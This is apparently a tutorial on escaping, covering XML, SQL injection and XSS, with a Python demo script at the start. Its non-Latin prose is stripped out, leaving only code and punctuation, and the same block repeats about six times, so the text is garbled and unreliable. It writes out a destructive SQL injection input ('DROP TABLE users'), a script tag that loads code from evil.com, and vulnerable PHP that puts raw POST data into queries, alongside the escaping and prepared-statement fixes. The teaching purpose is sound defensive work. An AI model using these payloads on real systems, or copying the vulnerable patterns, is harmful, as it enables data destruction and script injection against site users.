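        "SELECT name FROM sqlite_master WHERE type = 'table' AND name = ?",
        (table,),
    ).fetchone()
    return row is not None


def render_post_body(body: str) -> str:
    """HTML context: escape &, <, >, and quotes the way htmlspecialchars
    with ENT_QUOTES does, so the post body stays text inside the <p>."""
    return '<p class="body">' + html.escape(body, quote=True) + "</p>"


if __name__ == "__main__":
    conn = make_db()
    for name in NAME_INPUTS:
        print("input:    ", name)
        print("naive SQL:", build_query_naive(name))
        print("naive run:", lookup_naive(conn, name))
        print("prepared: ", lookup_prepared(conn, name))
    print("users table still present:", table_exists(conn, "users"))
    print(render_post_body(SCRIPT_BODY))
```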
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
"<" becomes "&lt;", and ">" becomes "&gt;".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
